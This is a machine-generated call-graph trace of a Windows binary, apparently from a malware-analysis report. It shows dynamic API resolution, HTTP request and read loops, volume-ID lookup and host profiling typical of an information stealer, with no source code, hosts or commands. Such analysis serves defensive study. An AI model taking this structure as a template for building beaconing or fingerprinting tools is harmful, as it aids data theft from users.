14214->14215 14216 de3861 14215->14216 14217 de45c0 2 API calls 14216->14217 14218 de387a 14217->14218 14219 de45c0 2 API calls 14218->14219 14220 de3893 14219->14220 14221 de45c0 2 API calls 14220->14221 14222 de38ac 14221->14222 14223 de45c0 2 API calls 14222->14223 14224 de38c5 14223->14224 14225 de45c0 2 API calls 14224->14225 14226 de38de 14225->14226 14227 de45c0 2 API calls 14226->14227 14228 de38f7 14227->14228 14229 de45c0 2 API calls 14228->14229 14230 de3910 14229->14230 14231 de45c0 2 API calls 14230->14231 14232 de3929 14231->14232 14233 de45c0 2 API calls 14232->14233 14234 de3942 14233->14234 14235 de45c0 2 API calls 14234->14235 14236 de395b 14235->14236 14237 de45c0 2 API calls 14236->14237 14238 de3974 14237->14238 14239 de45c0 2 API calls 14238->14239 14240 de398d 14239->14240 14241 de45c0 2 API calls 14240->14241 14242 de39a6 14241->14242 14243 de45c0 2 API calls 14242->14243 14244 de39bf 14243->14244 14245 de45c0 2 API calls 14244->14245 14246 de39d8 14245->14246 14247 de45c0 2 API calls 14246->14247 14248 de39f1 14247->14248 14249 de45c0 2 API calls 14248->14249 14250 de3a0a 14249->14250 14251 de45c0 2 API calls 14250->14251 14252 de3a23 14251->14252 14253 de45c0 2 API calls 14252->14253 14254 de3a3c 14253->14254 14255 de45c0 2 API calls 14254->14255 14256 de3a55 14255->14256 14257 de45c0 2 API calls 14256->14257 14258 de3a6e 14257->14258 14259 de45c0 2 API calls 14258->14259 14260 de3a87 14259->14260 14261 de45c0 2 API calls 14260->14261 14262 de3aa0 14261->14262 14263 de45c0 2 API calls 14262->14263 14264 de3ab9 14263->14264 14265 de45c0 2 API calls 14264->14265 14266 de3ad2 14265->14266 14267 de45c0 2 API calls 14266->14267 14268 de3aeb 14267->14268 14269 de45c0 2 API calls 14268->14269 14270 de3b04 14269->14270 14271 de45c0 2 API calls 14270->14271 14272 de3b1d 14271->14272 14273 de45c0 2 API calls 14272->14273 14274 de3b36 14273->14274 14275 de45c0 2 API calls 14274->14275 14276 de3b4f 14275->14276 14277 de45c0 2 API calls 14276->14277 14278 de3b68 14277->14278 14279 de45c0 2 API calls 14278->14279 14280 de3b81 14279->14280 14281 de45c0 2 API calls 14280->14281 14282 de3b9a 14281->14282 14283 de45c0 2 API calls 14282->14283 14284 de3bb3 14283->14284 14285 de45c0 2 API calls 14284->14285 14286 de3bcc 14285->14286 14287 de45c0 2 API calls 14286->14287 14288 de3be5 14287->14288 14289 de45c0 2 API calls 14288->14289 14290 de3bfe 14289->14290 14291 de45c0 2 API calls 14290->14291 14292 de3c17 14291->14292 14293 de45c0 2 API calls 14292->14293 14294 de3c30 14293->14294 14295 de45c0 2 API calls 14294->14295 14296 de3c49 14295->14296 14297 de45c0 2 API calls 14296->14297 14298 de3c62 14297->14298 14299 de45c0 2 API calls 14298->14299 14300 de3c7b 14299->14300 14301 de45c0 2 API calls 14300->14301 14302 de3c94 14301->14302 14303 de45c0 2 API calls 14302->14303 14304 de3cad 14303->14304 14305 de45c0 2 API calls 14304->14305 14306 de3cc6 14305->14306 14307 de45c0 2 API calls 14306->14307 14308 de3cdf 14307->14308 14309 de45c0 2 API calls 14308->14309 14310 de3cf8 14309->14310 14311 de45c0 2 API calls 14310->14311 14312 de3d11 14311->14312 14313 de45c0 2 API calls 14312->14313 14314 de3d2a 14313->14314 14315 de45c0 2 API calls 14314->14315 14316 de3d43 14315->14316 14317 de45c0 2 API calls 14316->14317 14318 de3d5c 14317->14318 14319 de45c0 2 API calls 14318->14319 14320 de3d75 14319->14320 14321 de45c0 2 API calls 14320->14321 14322 de3d8e 14321->14322 14323 de45c0 2 API calls 14322->14323 14324 de3da7 14323->14324 14325 de45c0 2 API calls 14324->14325 14326 de3dc0 14325->14326 14327 de45c0 2 API calls 14326->14327 14328 de3dd9 14327->14328 14329 de45c0 2 API calls 14328->14329 14330 de3df2 14329->14330 14331 de45c0 2 API calls 14330->14331 14332 de3e0b 14331->14332 14333 de45c0 2 API calls 14332->14333 14334 de3e24 14333->14334 14335 de45c0 2 API calls 14334->14335 14336 de3e3d 14335->14336 14337 de45c0 2 API calls 14336->14337 14338 de3e56 14337->14338 14339 de45c0 2 API calls 14338->14339 14340 de3e6f 14339->14340 14341 de45c0 2 API calls 14340->14341 14342 de3e88 14341->14342 14343 de45c0 2 API calls 14342->14343 14344 de3ea1 14343->14344 14345 de45c0 2 API calls 14344->14345 14346 de3eba 14345->14346 14347 de45c0 2 API calls 14346->14347 14348 de3ed3 14347->14348 14349 de45c0 2 API calls 14348->14349 14350 de3eec 14349->14350 14351 de45c0 2 API calls 14350->14351 14352 de3f05 14351->14352 14353 de45c0 2 API calls 14352->14353 14354 de3f1e 14353->14354 14355 de45c0 2 API calls 14354->14355 14356 de3f37 14355->14356 14357 de45c0 2 API calls 14356->14357 14358 de3f50 14357->14358 14359 de45c0 2 API calls 14358->14359 14360 de3f69 14359->14360 14361 de45c0 2 API calls 14360->14361 14362 de3f82 14361->14362 14363 de45c0 2 API calls 14362->14363 14364 de3f9b 14363->14364 14365 de45c0 2 API calls 14364->14365 14366 de3fb4 14365->14366 14367 de45c0 2 API calls 14366->14367 14368 de3fcd 14367->14368 14369 de45c0 2 API calls 14368->14369 14370 de3fe6 14369->14370 14371 de45c0 2 API calls 14370->14371 14372 de3fff 14371->14372 14373 de45c0 2 API calls 14372->14373 14374 de4018 14373->14374 14375 de45c0 2 API calls 14374->14375 14376 de4031 14375->14376 14377 de45c0 2 API calls 14376->14377 14378 de404a 14377->14378 14379 de45c0 2 API calls 14378->14379 14380 de4063 14379->14380 14381 de45c0 2 API calls 14380->14381 14382 de407c 14381->14382 14383 de45c0 2 API calls 14382->14383 14384 de4095 14383->14384 14385 de45c0 2 API calls 14384->14385 14386 de40ae 14385->14386 14387 de45c0 2 API calls 14386->14387 14388 de40c7 14387->14388 14389 de45c0 2 API calls 14388->14389 14390 de40e0 14389->14390 14391 de45c0 2 API calls 14390->14391 14392 de40f9 14391->14392 14393 de45c0 2 API calls 14392->14393 14394 de4112 14393->14394 14395 de45c0 2 API calls 14394->14395 14396 de412b 14395->14396 14397 de45c0 2 API calls 14396->14397 14398 de4144 14397->14398 14399 de45c0 2 API calls 14398->14399 14400 de415d 14399->14400 14401 de45c0 2 API calls 14400->14401 14402 de4176 14401->14402 14403 de45c0 2 API calls 14402->14403 14404 de418f 14403->14404 14405 de45c0 2 API calls 14404->14405 14406 de41a8 14405->14406 14407 de45c0 2 API calls 14406->14407 14408 de41c1 14407->14408 14409 de45c0 2 API calls 14408->14409 14410 de41da 14409->14410 14411 de45c0 2 API calls 14410->14411 14412 de41f3 14411->14412 14413 de45c0 2 API calls 14412->14413 14414 de420c 14413->14414 14415 de45c0 2 API calls 14414->14415 14416 de4225 14415->14416 14417 de45c0 2 API calls 14416->14417 14418 de423e 14417->14418 14419 de45c0 2 API calls 14418->14419 14420 de4257 14419->14420 14421 de45c0 2 API calls 14420->14421 14422 de4270 14421->14422 14423 de45c0 2 API calls 14422->14423 14424 de4289 14423->14424 14425 de45c0 2 API calls 14424->14425 14426 de42a2 14425->14426 14427 de45c0 2 API calls 14426->14427 14428 de42bb 14427->14428 14429 de45c0 2 API calls 14428->14429 14430 de42d4 14429->14430 14431 de45c0 2 API calls 14430->14431 14432 de42ed 14431->14432 14433 de45c0 2 API calls 14432->14433 14434 de4306 14433->14434 14435 de45c0 2 API calls 14434->14435 14436 de431f 14435->14436 14437 de45c0 2 API calls 14436->14437 14438 de4338 14437->14438 14439 de45c0 2 API calls 14438->14439 14440 de4351 14439->14440 14441 de45c0 2 API calls 14440->14441 14442 de436a 14441->14442 14443 de45c0 2 API calls 14442->14443 14444 de4383 14443->14444 14445 de45c0 2 API calls 14444->14445 14446 de439c 14445->14446 14447 de45c0 2 API calls 14446->14447 14448 de43b5 14447->14448 14449 de45c0 2 API calls 14448->14449 14450 de43ce 14449->14450 14451 de45c0 2 API calls 14450->14451 14452 de43e7 14451->14452 14453 de45c0 2 API calls 14452->14453 14454 de4400 14453->14454 14455 de45c0 2 API calls 14454->14455 14456 de4419 14455->14456 14457 de45c0 2 API calls 14456->14457 14458 de4432 14457->14458 14459 de45c0 2 API calls 14458->14459 14460 de444b 14459->14460 14461 de45c0 2 API calls 14460->14461 14462 de4464 14461->14462 14463 de45c0 2 API calls 14462->14463 14464 de447d 14463->14464 14465 de45c0 2 API calls 14464->14465 14466 de4496 14465->14466 14467 de45c0 2 API calls 14466->14467 14468 de44af 14467->14468 14469 de45c0 2 API calls 14468->14469 14470 de44c8 14469->14470 14471 de45c0 2 API calls 14470->14471 14472 de44e1 14471->14472 14473 de45c0 2 API calls 14472->14473 14474 de44fa 14473->14474 14475 de45c0 2 API calls 14474->14475 14476 de4513 14475->14476 14477 de45c0 2 API calls 14476->14477 14478 de452c 14477->14478 14479 de45c0 2 API calls 14478->14479 14480 de4545 14479->14480 14481 de45c0 2 API calls 14480->14481 14482 de455e 14481->14482 14483 de45c0 2 API calls 14482->14483 14484 de4577 14483->14484 14485 de45c0 2 API calls 14484->14485 14486 de4590 14485->14486 14487 de45c0 2 API calls 14486->14487 14488 de45a9 14487->14488 14489 df9c10 14488->14489 14490 dfa036 8 API calls 14489->14490 14491 df9c20 43 API calls 14489->14491 14492 dfa0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14490->14492 14493 dfa146 14490->14493 14491->14490 14492->14493 14494 dfa216 14493->14494 14495 dfa153 8 API calls 14493->14495 14496 dfa21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14494->14496 14497 dfa298 14494->14497 14495->14494 14496->14497 14498 dfa337 14497->14498 14499 dfa2a5 6 API calls 14497->14499 14500 dfa41f 14498->14500 14501 dfa344 9 API calls 14498->14501 14499->14498 14502 dfa428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14500->14502 14503 dfa4a2 14500->14503 14501->14500 14502->14503 14504 dfa4dc 14503->14504 14505 dfa4ab GetProcAddress GetProcAddress 14503->14505 14506 dfa515 14504->14506 14507 dfa4e5 GetProcAddress GetProcAddress 14504->14507 14505->14504 14508 dfa612 14506->14508 14509 dfa522 10 API calls 14506->14509 14507->14506 14510 dfa67d 14508->14510 14511 dfa61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14508->14511 14509->14508 14512 dfa69e 14510->14512 14513 dfa686 GetProcAddress 14510->14513 14511->14510 14514 df5ca3 14512->14514 14515 dfa6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14512->14515 14513->14512 14516 de1590 14514->14516 14515->14514 15637 de1670 14516->15637 14519 dfa7a0 lstrcpy 14520 de15b5 14519->14520 14521 dfa7a0 lstrcpy 14520->14521 14522 de15c7 14521->14522 14523 dfa7a0 lstrcpy 14522->14523 14524 de15d9 14523->14524 14525 dfa7a0 lstrcpy 14524->14525 14526 de1663 14525->14526 14527 df5510 14526->14527 14528 df5521 14527->14528 14529 dfa820 2 API calls 14528->14529 14530 df552e 14529->14530 14531 dfa820 2 API calls 14530->14531 14532 df553b 14531->14532 14533 dfa820 2 API calls 14532->14533 14534 df5548 14533->14534 14535 dfa740 lstrcpy 14534->14535 14536 df5555 14535->14536 14537 dfa740 lstrcpy 14536->14537 14538 df5562 14537->14538 14539 dfa740 lstrcpy 14538->14539 14540 df556f 14539->14540 14541 dfa740 lstrcpy 14540->14541 14581 df557c 14541->14581 14542 df5643 StrCmpCA 14542->14581 14543 df56a0 StrCmpCA 14544 df57dc 14543->14544 14543->14581 14545 dfa8a0 lstrcpy 14544->14545 14546 df57e8 14545->14546 14547 dfa820 2 API calls 14546->14547 14550 df57f6 14547->14550 14548 dfa820 lstrlen lstrcpy 14548->14581 14549 df51f0 20 API calls 14549->14581 14552 dfa820 2 API calls 14550->14552 14551 df5856 StrCmpCA 14553 df5991 14551->14553 14551->14581 14555 df5805 14552->14555 14554 dfa8a0 lstrcpy 14553->14554 14556 df599d 14554->14556 14557 de1670 lstrcpy 14555->14557 14558 dfa820 2 API calls 14556->14558 14579 df5811 14557->14579 14559 df59ab 14558->14559 14561 dfa820 2 API calls 14559->14561 14560 df5a0b StrCmpCA 14562 df5a28 14560->14562 14563 df5a16 Sleep 14560->14563 14566 df59ba 14561->14566 14567 dfa8a0 lstrcpy 14562->14567 14563->14581 14564 dfa740 lstrcpy 14564->14581 14565 dfa7a0 lstrcpy 14565->14581 14568 de1670 lstrcpy 14566->14568 14569 df5a34 14567->14569 14568->14579 14570 dfa820 2 API calls 14569->14570 14571 df5a43 14570->14571 14573 dfa820 2 API calls 14571->14573 14572 df52c0 25 API calls 14572->14581 14574 df5a52 14573->14574 14576 de1670 lstrcpy 14574->14576 14575 df578a StrCmpCA 14575->14581 14576->14579 14577 de1590 lstrcpy 14577->14581 14578 df593f StrCmpCA 14578->14581 14579->13634 14580 dfa8a0 lstrcpy 14580->14581 14581->14542 14581->14543 14581->14548 14581->14549 14581->14551 14581->14560 14581->14564 14581->14565 14581->14572 14581->14575 14581->14577 14581->14578 14581->14580 14583 df754c 14582->14583 14584 df7553 GetVolumeInformationA 14582->14584 14583->14584 14585 df7591 14584->14585 14586 df75fc GetProcessHeap RtlAllocateHeap 14585->14586 14587 df7619 14586->14587 14588 df7628 wsprintfA 14586->14588 14589 dfa740 lstrcpy 14587->14589 14590 dfa740 lstrcpy 14588->14590 14591 df5da7 14589->14591 14590->14591 14591->13655 14593 dfa7a0 lstrcpy 14592->14593 14594 de4899 14593->14594 15646 de47b0 14594->15646 14596 de48a5 14597 dfa740 lstrcpy 14596->14597 14598 de48d7 14597->14598 14599 dfa740 lstrcpy 14598->14599 14600 de48e4 14599->14600 14601 dfa740 lstrcpy 14600->14601 14602 de48f1 14601->14602 14603 dfa740 lstrcpy 14602->14603 14604 de48fe 14603->14604 14605 dfa740 lstrcpy 14604->14605 14606 de490b InternetOpenA StrCmpCA 14605->14606 14607 de4944 14606->14607 14608 de4ecb InternetCloseHandle 14607->14608 15652 df8b60 14607->15652 14610 de4ee8 14608->14610 15667 de9ac0 CryptStringToBinaryA 14610->15667 14611 de4963 15660 dfa920 14611->15660 14615 de4976 14616 dfa8a0 lstrcpy 14615->14616 14621 de497f 14616->14621 14617 dfa820 2 API calls 14618 de4f05 14617->14618 14619 dfa9b0 4 API calls 14618->14619 14622 de4f1b 14619->14622 14620 de4f27 codecvt 14624 dfa7a0 lstrcpy 14620->14624 14625 dfa9b0 4 API calls 14621->14625 14623 dfa8a0 lstrcpy 14622->14623 14623->14620 14637 de4f57 14624->14637 14626 de49a9 14625->14626 14627 dfa8a0 lstrcpy 14626->14627 14628 de49b2 14627->14628 14629 dfa9b0 4 API calls 14628->14629 14630 de49d1 14629->14630 14631 dfa8a0 lstrcpy 14630->14631 14632 de49da 14631->14632 14633 dfa920 3 API calls 14632->14633 14634 de49f8 14633->14634 14635 dfa8a0 lstrcpy 14634->14635 14636 de4a01 14635->14636 14638 dfa9b0 4 API calls 14636->14638 14637->13658 14639 de4a20 14638->14639 14640 dfa8a0 lstrcpy 14639->14640 14641 de4a29 14640->14641 14642 dfa9b0 4 API calls 14641->14642 14643 de4a48 14642->14643 14644 dfa8a0 lstrcpy 14643->14644 14645 de4a51 14644->14645 14646 dfa9b0 4 API calls 14645->14646 14647 de4a7d 14646->14647 14648 dfa920 3 API calls 14647->14648 14649 de4a84 14648->14649 14650 dfa8a0 lstrcpy 14649->14650 14651 de4a8d 14650->14651 14652 de4aa3 InternetConnectA 14651->14652 14652->14608 14653 de4ad3 HttpOpenRequestA 14652->14653 14655 de4ebe InternetCloseHandle 14653->14655 14656 de4b28 14653->14656 14655->14608 14657 dfa9b0 4 API calls 14656->14657 14658 de4b3c 14657->14658 14659 dfa8a0 lstrcpy 14658->14659 14660 de4b45 14659->14660 14661 dfa920 3 API calls 14660->14661 14662 de4b63 14661->14662 14663 dfa8a0 lstrcpy 14662->14663 14664 de4b6c 14663->14664 14665 dfa9b0 4 API calls 14664->14665 14666 de4b8b 14665->14666 14667 dfa8a0 lstrcpy 14666->14667 14668 de4b94 14667->14668 14669 dfa9b0 4 API calls 14668->14669 14670 de4bb5 14669->14670 14671 dfa8a0 lstrcpy 14670->14671 14672 de4bbe 14671->14672 14673 dfa9b0 4 API calls 14672->14673 14674 de4bde 14673->14674 14675 dfa8a0 lstrcpy 14674->14675 14676 de4be7 14675->14676 14677 dfa9b0 4 API calls 14676->14677 14678 de4c06 14677->14678 14679 dfa8a0 lstrcpy 14678->14679 14680 de4c0f 14679->14680 14681 dfa920 3 API calls 14680->14681 14682 de4c2d 14681->14682 14683 dfa8a0 lstrcpy 14682->14683 14684 de4c36 14683->14684 14685 dfa9b0 4 API calls 14684->14685 14686 de4c55 14685->14686 14687 dfa8a0 lstrcpy 14686->14687 14688 de4c5e 14687->14688 14689 dfa9b0 4 API calls 14688->14689 14690 de4c7d 14689->14690 14691 dfa8a0 lstrcpy 14690->14691 14692 de4c86 14691->14692 14693 dfa920 3 API calls 14692->14693 14694 de4ca4 14693->14694 14695 dfa8a0 lstrcpy 14694->14695 14696 de4cad 14695->14696 14697 dfa9b0 4 API calls 14696->14697 14698 de4ccc 14697->14698 14699 dfa8a0 lstrcpy 14698->14699 14700 de4cd5 14699->14700 14701 dfa9b0 4 API calls 14700->14701 14702 de4cf6 14701->14702 14703 dfa8a0 lstrcpy 14702->14703 14704 de4cff 14703->14704 14705 dfa9b0 4 API calls 14704->14705 14706 de4d1f 14705->14706 14707 dfa8a0 lstrcpy 14706->14707 14708 de4d28 14707->14708 14709 dfa9b0 4 API calls 14708->14709 14710 de4d47 14709->14710 14711 dfa8a0 lstrcpy 14710->14711 14712 de4d50 14711->14712 14713 dfa920 3 API calls 14712->14713 14714 de4d6e 14713->14714 14715 dfa8a0 lstrcpy 14714->14715 14716 de4d77 14715->14716 14717 dfa740 lstrcpy 14716->14717 14718 de4d92 14717->14718 14719 dfa920 3 API calls 14718->14719 14720 de4db3 14719->14720 14721 dfa920 3 API calls 14720->14721 14722 de4dba 14721->14722 14723 dfa8a0 lstrcpy 14722->14723 14724 de4dc6 14723->14724 14725 de4de7 lstrlen 14724->14725 14726 de4dfa 14725->14726 14727 de4e03 lstrlen 14726->14727 15666 dfaad0 14727->15666 14729 de4e13 HttpSendRequestA 14730 de4e32 InternetReadFile 14729->14730 14731 de4e67 InternetCloseHandle 14730->14731 14736 de4e5e 14730->14736 14734 dfa800 14731->14734 14733 dfa9b0 4 API calls 14733->14736 14734->14655 14735 dfa8a0 lstrcpy 14735->14736 14736->14730 14736->14731 14736->14733 14736->14735 15673 dfaad0 14737->15673 14739 df17c4 StrCmpCA 14740 df17cf ExitProcess 14739->14740 14741 df17d7 14739->14741 14742 df19c2 14741->14742 14743 df187f StrCmpCA 14741->14743 14744 df185d StrCmpCA 14741->14744 14745 df1913 StrCmpCA 14741->14745 14746 df1932 StrCmpCA 14741->14746 14747 df18f1 StrCmpCA 14741->14747 14748 df1951 StrCmpCA 14741->14748 14749 df1970 StrCmpCA 14741->14749 14750 df18cf StrCmpCA 14741->14750 14751 df18ad StrCmpCA 14741->14751 14752 dfa820 lstrlen lstrcpy 14741->14752 14742->13660 14743->14741 14744->14741 14745->14741 14746->14741 14747->14741 14748->14741 14749->14741 14750->14741 14751->14741 14752->14741 14754 dfa7a0 lstrcpy 14753->14754 14755 de5979 14754->14755 14756 de47b0 2 API calls 14755->14756 14757 de5985 14756->14757 14758 dfa740 lstrcpy 14757->14758 14759 de59ba 14758->14759 14760 dfa740 lstrcpy 14759->14760 14761 de59c7 14760->14761 14762 dfa740 lstrcpy 14761->14762 14763 de59d4 14762->14763 14764 dfa740 lstrcpy 14763->14764 14765 de59e1 14764->14765 14766 dfa740 lstrcpy 14765->14766 14767 de59ee InternetOpenA StrCmpCA 14766->14767 14768 de5a1d 14767->14768 14769 de5fc3 InternetCloseHandle 14768->14769 14770 df8b60 3 API calls 14768->14770 14771 de5fe0 14769->14771 14772 de5a3c 14770->14772 14774 de9ac0 4 API calls 14771->14774 14773 dfa920 3 API calls 14772->14773 14775 de5a4f 14773->14775 14776 de5fe6 14774->14776 14777 dfa8a0 lstrcpy 14775->14777 14778 dfa820 2 API calls 14776->14778 14780 de601f codecvt 14776->14780 14782 de5a58 14777->14782 14779 de5ffd 14778->14779 14781 dfa9b0 4 API calls 14779->14781 14784 dfa7a0 lstrcpy 14780->14784 14783 de6013 14781->14783 14786 dfa9b0 4 API calls 14782->14786 14785 dfa8a0 lstrcpy 14783->14785 14794 de604f 14784->14794 14785->14780 14787 de5a82 14786->14787 14788 dfa8a0 lstrcpy 14787->14788 14789 de5a8b 14788->14789 14790 dfa9b0 4 API calls 14789->14790 14791 de5aaa 14790->14791 14792 dfa8a0 lstrcpy 14791->14792 14793 de5ab3 14792->14793 14795 dfa920 3 API calls 14793->14795 14794->13666 14796 de5ad1 14795->14796 14797 dfa8a0 lstrcpy 14796->14797 14798 de5ada 14797->14798 14799 dfa9b0 4 API calls 14798->14799 14800 de5af9 14799->14800 14801 dfa8a0 lstrcpy 14800->14801 14802 de5b02 14801->14802 14803 dfa9b0 4 API calls 14802->14803 14804 de5b21 14803->14804 14805 dfa8a0 lstrcpy 14804->14805 14806 de5b2a 14805->14806 14807 dfa9b0 4 API calls 14806->14807 14808 de5b56 14807->14808 14809 dfa920 3 API calls 14808->14809 14810 de5b5d 14809->14810 14811 dfa8a0 lstrcpy 14810->14811 14812 de5b66 14811->14812 14813 de5b7c InternetConnectA 14812->14813 14813->14769 14814 de5bac HttpOpenRequestA 14813->14814 14816 de5c0b 14814->14816 14817 de5fb6 InternetCloseHandle 14814->14817 14818 dfa9b0 4 API calls 14816->14818 14817->14769 14819 de5c1f 14818->14819 14820 dfa8a0 lstrcpy 14819->14820 14821 de5c28 14820->14821 14822 dfa920 3 API calls 14821->14822 14823 de5c46 14822->14823 14824 dfa8a0 lstrcpy 14823->14824 14825 de5c4f 14824->14825 14826 dfa9b0 4 API calls 14825->14826 14827 de5c6e 14826->14827 14828 dfa8a0 lstrcpy 14827->14828 14829 de5c77 14828->14829 14830 dfa9b0 4 API calls 14829->14830 14831 de5c98 14830->14831 14832 dfa8a0 lstrcpy 14831->14832 14833 de5ca1 14832->14833 14834 dfa9b0 4 API calls 14833->14834 14835 de5cc1 14834->14835 14836 dfa8a0 lstrcpy 14835->14836 14837 de5cca 14836->14837 14838 dfa9b0 4 API calls 14837->14838 14839 de5ce9 14838->14839 14840 dfa8a0 lstrcpy 14839->14840 14841 de5cf2 14840->14841 14842 dfa920 3 API calls 14841->14842 14843 de5d10 14842->14843 14844 dfa8a0 lstrcpy 14843->14844 14845 de5d19 14844->14845 14846 dfa9b0 4 API calls 14845->14846 14847 de5d38 14846->14847 14848 dfa8a0 lstrcpy 14847->14848 14849 de5d41 14848->14849 14850 dfa9b0 4 API calls 14849->14850 14851 de5d60 14850->14851 14852 dfa8a0 lstrcpy 14851->14852 14853 de5d69 14852->14853 14854 dfa920 3 API calls 14853->14854 14855 de5d87 14854->14855 14856 dfa8a0 lstrcpy 14855->14856 14857 de5d90 14856->14857 14858 dfa9b0 4 API calls 14857->14858 14859 de5daf 14858->14859 14860 dfa8a0 lstrcpy 14859->14860 14861 de5db8 14860->14861 14862 dfa9b0 4 API calls 14861->14862 14863 de5dd9 14862->14863 14864 dfa8a0 lstrcpy 14863->14864 14865 de5de2 14864->14865 14866 dfa9b0 4 API calls 14865->14866 14867 de5e02 14866->14867 14868 dfa8a0 lstrcpy 14867->14868 14869 de5e0b 14868->14869 14870 dfa9b0 4 API calls 14869->14870 14871 de5e2a 14870->14871 14872 dfa8a0 lstrcpy 14871->14872 14873 de5e33 14872->14873 14874 dfa920 3 API calls 14873->14874 14875 de5e54 14874->14875 14876 dfa8a0 lstrcpy 14875->14876 14877 de5e5d 14876->14877 14878 de5e70 lstrlen 14877->14878 15674 dfaad0 14878->15674 14880 de5e81 lstrlen GetProcessHeap RtlAllocateHeap 15675 dfaad0 14880->15675 14882 de5eae lstrlen 14883 de5ebe 14882->14883 14884 de5ed7 lstrlen 14883->14884 14885 de5ee7 14884->14885 14886 de5ef0 lstrlen 14885->14886 14887 de5f03 14886->14887 14888 de5f1a lstrlen 14887->14888 15676 dfaad0 14888->15676 14890 de5f2a HttpSendRequestA 14891 de5f35 InternetReadFile 14890->14891 14892 de5f6a InternetCloseHandle 14891->14892 14896 de5f61 14891->14896 14892->14817 14894 dfa9b0 4 API calls 14894->14896 14895 dfa8a0 lstrcpy 14895->14896 14896->14891 14896->14892 14896->14894 14896->14895 14899 df1077 14897->14899 14898 df1151 14898->13668 14899->14898 14900 dfa820 lstrlen lstrcpy 14899->14900 14900->14899 14902 df0db7 14901->14902 14903 df0e27 StrCmpCA 14902->14903 14904 df0e67 StrCmpCA 14902->14904 14905 df0ea4 StrCmpCA 14902->14905 14906 df0f17 14902->14906 14907 dfa820 lstrlen lstrcpy 14902->14907 14903->14902 14904->14902 14905->14902 14906->13676 14907->14902 14909 df0f67 14908->14909 14910 df1044 14909->14910 14911 df0fb2 StrCmpCA 14909->14911 14912 dfa820 lstrlen lstrcpy 14909->14912 14910->13684 14911->14909 14912->14909 14914 dfa740 lstrcpy 14913->14914 14915 df1a26 14914->14915 14916 dfa9b0 4 API calls 14915->14916 14917 df1a37 14916->14917 14918 dfa8a0 lstrcpy 14917->14918 14919 df1a40 14918->14919 14920 dfa9b0 4 API calls 14919->14920 14921 df1a5b 14920->14921 14922 dfa8a0 lstrcpy 14921->14922 14923 df1a64 14922->14923 14924 dfa9b0 4 API calls 14923->14924 14925 df1a7d 14924->14925 14926 dfa8a0 lstrcpy 14925->14926 14927 df1a86 14926->14927 14928 dfa9b0 4 API calls 14927->14928 14929 df1aa1 14928->14929 14930 dfa8a0 lstrcpy 14929->14930 14931 df1aaa 14930->14931 14932 dfa9b0 4 API calls 14931->14932 14933 df1ac3 14932->14933 14934 dfa8a0 lstrcpy 14933->14934 14935 df1acc 14934->14935 14936 dfa9b0 4 API calls 14935->14936 14937 df1ae7 14936->14937 14938 dfa8a0 lstrcpy 14937->14938 14939 df1af0 14938->14939 14940 dfa9b0 4 API calls 14939->14940 14941 df1b09 14940->14941 14942 dfa8a0 lstrcpy 14941->14942 14943 df1b12 14942->14943 14944 dfa9b0 4 API calls 14943->14944 14945 df1b2d 14944->14945 14946 dfa8a0 lstrcpy 14945->14946 14947 df1b36 14946->14947 14948 dfa9b0 4 API calls 14947->14948 14949 df1b4f 14948->14949 14950 dfa8a0 lstrcpy 14949->14950 14951 df1b58 14950->14951 14952 dfa9b0 4 API calls 14951->14952 14953 df1b76 14952->14953 14954 dfa8a0 lstrcpy 14953->14954 14955 df1b7f 14954->14955 14956 df7500 6 API calls 14955->14956 14957 df1b96 14956->14957 14958 dfa920 3 API calls 14957->14958 14959 df1ba9 14958->14959 14960 dfa8a0 lstrcpy 14959->14960 14961 df1bb2 14960->14961 14962 dfa9b0 4 API calls 14961->14962 14963 df1bdc 14962->14963 14964 dfa8a0 lstrcpy 14963->14964 14965 df1be5 14964->14965 14966 dfa9b0 4 API calls 14965->14966 14967 df1c05 14966->14967 14968 dfa8a0 lstrcpy 14967->14968 14969 df1c0e 14968->14969 15677 df7690 GetProcessHeap RtlAllocateHeap 14969->15677 14972 dfa9b0 4 API calls 14973 df1c2e 14972->14973 14974 dfa8a0 lstrcpy 14973->14974 14975 df1c37 14974->14975 14976 dfa9b0 4 API calls 14975->14976 14977 df1c56 14976->14977 14978 dfa8a0 lstrcpy 14977->14978 14979 df1c5f 14978->14979 14980 dfa9b0 4 API calls 14979->14980 14981 df1c80 14980->14981 14982 dfa8a0 lstrcpy 14981->14982 14983 df1c89 14982->14983 15684 df77c0 GetCurrentProcess IsWow64Process 14983->15684 14986 dfa9b0 4 API calls 14987 df1ca9 14986->14987 14988 dfa8a0 lstrcpy 14987->14988 14989 df1cb2 14988->14989 14990 dfa9b0 4 API calls 14989->14990 14991 df1cd1 14990->14991 14992 dfa8a0 lstrcpy 14991->14992 14993 df1cda 14992->14993 14994 dfa9b0 4 API calls 14993->14994 14995 df1cfb 14994->14995 14996 dfa8a0 lstrcpy 14995->14996 14997 df1d04 14996->14997 14998 df7850 3 API calls 14997->14998 14999 df1d14 14998->14999 15000 dfa9b0 4 API calls 14999->15000 15001 df1d24 15000->15001 15002 dfa8a0 lstrcpy 15001->15002 15003 df1d2d 15002->15003 15004 dfa9b0 4 API calls 15003->15004 15005 df1d4c 15004->15005 15006 dfa8a0 lstrcpy 15005->15006 15007 df1d55 15006->15007 15008 dfa9b0 4 API calls 15007->15008 15009 df1d75 15008->15009 15010 dfa8a0 lstrcpy 15009->15010 15011 df1d7e 15010->15011 15012 df78e0 3 API calls 15011->15012 15013 df1d8e 15012->15013 15014 dfa9b0 4 API calls 15013->15014 15015 df1d9e 15014->15015 15016 dfa8a0 lstrcpy 15015->15016 15017 df1da7 15016->15017 15018 dfa9b0 4 API calls 15017->15018 15019 df1dc6 15018->15019 15020 dfa8a0 lstrcpy 15019->15020 15021 df1dcf 15020->15021 15022 dfa9b0 4 API calls 15021->15022 15023 df1df0 15022->15023 15024 dfa8a0 lstrcpy 15023->15024 15025 df1df9 15024->15025 15686 df7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15025->15686 15028 dfa9b0 4 API calls 15029 df1e19 15028->15029 15030 dfa8a0 lstrcpy 15029->15030 15031 df1e22 15030->15031 15032 dfa9b0 4 API calls 15031->15032 15033 df1e41 15032->15033 15034 dfa8a0 lstrcpy 15033->15034 15035 df1e4a 15034->15035 15036 dfa9b0 4 API calls 15035->15036 15037 df1e6b 15036->15037 15038 dfa8a0 lstrcpy 15037->15038 15039 df1e74 15038->15039 